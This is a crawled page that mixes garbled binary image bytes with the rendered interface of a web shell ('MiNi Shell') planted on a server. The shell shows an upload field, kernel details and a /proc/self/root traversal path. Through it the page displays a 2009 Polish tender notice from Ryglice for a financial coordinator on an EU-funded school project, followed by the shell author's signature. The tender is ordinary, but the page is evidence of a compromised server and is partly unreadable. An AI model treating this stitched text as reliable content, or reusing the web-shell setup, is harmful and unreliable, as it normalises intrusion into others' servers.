JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090818/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090818/135769-N-2009.html

<p class="kh_header"><b>Ryglice: Pełnienie funkcji koordynatora finansowego w ramach projektu Dobry początek - lepsza przyszłość dzieci z Lubczy w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 135769 - 2009; data zamieszczenia: 18.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Ryglic , ul. Rynek 9, 33-160 Ryglice, woj. małopolskie, tel. 014 6541035, faks 014 6541054.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ryglice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji koordynatora finansowego w ramach projektu Dobry początek - lepsza przyszłość dzieci z Lubczy w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.   Przedmiotem zamówienia jest:
- pełnienie funkcji koordynatora finansowego projektu  Dobry początek - lepsza przyszłość dzieci z Lubczy WND-POKL.09.01.01-12-048/09 w ramach Programu Operacyjnego Kapitał Ludzki. Działania 9.1 Wyrównywanie szans edukacyjnych i zapewnienie  wysokiej jakości   usług  edukacyjnych  świadczonych w  systemie  oświaty współfinansowanego   przez   Unię    Europejską   ze    środków   Europejskiego    Funduszu Społecznego.
Przedmiotem   zamówienia jest  pełnienie  funkcji   koordynatora finansowego  projektu,   do   którego obowiązków będzie należało:
1)	Terminowe i właściwe realizowanie całości projektu, w szczególności zarządzanie przedsięwzięciem na wszystkich jego etapach i współpraca z koordynatorem merytorycznym.
3)	Koordynowanie działań projektowych.
2)	Nadzór nad zgodnością prowadzonych działań z zapisami zawartymi we wniosku, w tym budżetem i harmonogramem
3)	Kierowanie wykonaniem projektu w formie nadzoru finansowego i technicznego zgodnie z harmonogramem realizacji projektu, z zawartą umową o dofinansowanie projektu oraz wnioskiem aplikacyjnym oraz przepisami krajowymi i Unii Europejskiej.
4)	Nadzorowanie bieżących postępów w realizacji projektu.
5)	Zarządzanie planowanymi działaniami projektowymi.
6)	Prowadzenie wspólnie z koordynatorem merytorycznym i księgową Biura Projektu.
7)	Koordynacja prac zespołu projektowego i podejmowanie decyzji.
8)	Nadzorowanie wspólnie z koordynatorem merytorycznym pracy wszystkich osób zaangażowanych w realizację projektu.
9)	Koordynacja działań merytorycznych i logistycznych związanych z projektem.
10)	Utrzymywanie stałych kontaktów z opiekunem projektu w Instytucji Pośredniczącej, informowanie na bieżąco o wszystkich zaistniałych problemach w realizacji projektu, terminowe przesyłanie wszystkich wymaganych dokumentów i informacji, przestrzeganie obowiązków i zaleceń wynikających z realizacji umowy, procedur, standardów, instrukcji do sprawozdań oraz innych obowiązujących dokumentów.
11)	Rzetelne i terminowe sporządzanie wniosków o płatność wraz z zebraniem wszystkich załączników, w tym sporządzanie ostatniego wniosku o płatność.
12)	Przygotowanie i realizację zamówień publicznych zgodnie z ustawą Prawo Zamówień Publicznych w zakresie działań projektowych.
13)	Przygotowywanie i koordynacja korespondencji związanej z projektem do Instytucji Pośredniczącej.
14)	Planowanie działań i wywiązywanie się ze wskaźników.
15)	Kierowanie bieżącymi sprawami związanymi z realizacją projektu.
16)	Poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje zewnętrzne w zakresie realizacji projektu.
17)	Obecność podczas kontroli projektu.

18)	Opracowanie szczegółowego harmonogramu zajęć.
19)	Zaprojektowanie ankiet ewaluacyjnych dla potrzeb ewaluacji zgodnie z wytycznymi w projekcie.
20)	Monitoring i ewaluacja projektu oraz jego promocja.
21)	Kontrola wydatkowania środków.
22)	Dokonywanie innych czynności zastrzeżonych do kompetencji Koordynatora finansowego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5, 79.42.10.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy spełniający warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz spełniający warunki i wymagania określone w niniejszej Specyfikacji Istotnych Warunków Zamówienia, a w szczególności spełniają poniższe warunki:
-	są uprawnieni do występowania w obrocie prawnym zgodnie z wymogami ustawowymi.
-	zapewnią realizację zamówienia przez osobę posiadającą następujące kwalifikacje
i umiejętności:
a)	wykształcenie wyższe prawnicze lub/i administracyjne,
b)	posiadanie tytułu specjalisty ds. funduszy europejskich lub równorzędnego,
c)	znajomość zasad i procedur realizacji projektów współfinansowanych ze środków Unii Europejskiej,
d)	znajomość  przepisów ustawy  Prawo  zamówień  publicznych  oraz ustawy  o  finansach publicznych,

e)	umiejętność obsługi komputera (w tym programów Word, Excel, PowerPoint),
f)	doświadczenie przy realizacji minimum jednego projektu  współfinansowanego ze środków Unii Europejskiej, 
g)	 posiadanie zdolności organizacyjnych,
h)	posiadanie  pełnej   zdolności   do   czynności   prawnych   oraz  korzystanie   z  pełni   praw publicznych,
i)	nie były karane za przestępstwo popełnione umyślnie lub przestępstwo skarbowe.

Ocena spełnienia warunków udziału ma charakter eliminacyjny. Do udziału w postępowaniu dopuszczeni zostaną wykonawcy, którzy spełnią wszystkie warunki w postępowaniu. Ocena spełnienia warunków odbywać się będzie na zasadzie spełnia/ nie spełnia na podstawie oświadczenia wraz z ofertą i dokumentami wymienionymi poniżej.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawcy składają następujące dokumenty i załączniki:
1.	Formularz oferty - wypełniony i podpisany przez Wykonawcę - załącznik nr 1 do SIWZ,
2.	Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ustawy Prawo zamówień publicznych - załącznik nr 2 do SIWZ,
3.	Kwestionariusz osobowy wraz z oświadczeniem - załącznik nr 3 do SIWZ,
4.	Kserokopie dyplomów, świadectw potwierdzających wykształcenie i kwalifikacje kandydata oraz zaświadczenia o ukończonych kursach i szkoleniach, poświadczone za zgodność z oryginałem przez Wykonawcę,
5.	Oświadczenie Wykonawcy potwierdzające doświadczenie przy realizacji projektów współfinansowanych przez Unię Europejską (minimum jeden projekt).
6.	Zgoda na przetwarzanie danych osobowych dla potrzeb realizacji procesu rekrutacji zgodnie z ustawą o ochronie danych osobowych oraz ustawą o pracownikach samorządowych.
7.	Oświadczenie o znajomości obsługi pakietu MS Office, Internetu, generatora wniosków PO ICL i generatora wniosków o płatność.
8.	Oświadczenie o niekaralności za przestępstwo popełnione umyślnie lub przestępstwo skarbowe oraz o posiadanie pełnej zdolności do czynności prawnych oraz korzystania z pełni praw publicznych.

9.	Oświadczenie o znajomości zasad i procedur realizacji projektów współfinansowanych ze środków Unii Europejskiej.
10.	Oświadczenie o znajomości przepisów ustawy prawo zamówień publicznych oraz ustawy o finansach publicznych i kserokopie zaświadczeń potwierdzających ukończenie szkolenia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ryglice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ryglicach
ul. Rynek 9
33-160 Ryglice
pokój nr 2.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.08.2009 godzina 09:00, miejsce: Sekretariat Urzędu Miejskiego w Ryglicach
ul. Rynek 9
33-160 Ryglice
pokój nr 4.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dane dotyczące projektu: Dobry początek - lepsza przyszłość dzieci z Lubczy współfinansowanego ze środków Europejskiego Funduszu Społecznego i Budżetu Państwa w ramach programu POKL działanie 9.1, poddziałanie 9.1.1.
Miejsca realizacji: Zespół Szkół w Lubczy.
Biuro Projektu: Zespół Szkół w Lubczy, Lubcza 51, 33-162 Lubcza
Termin realizacji projektu: od 15.07.2009 roku do 31.12.2011 roku,
Wartość projektu-777 123,10 zł.

Creat By MiNi SheLL
Email: jattceo@gmail.com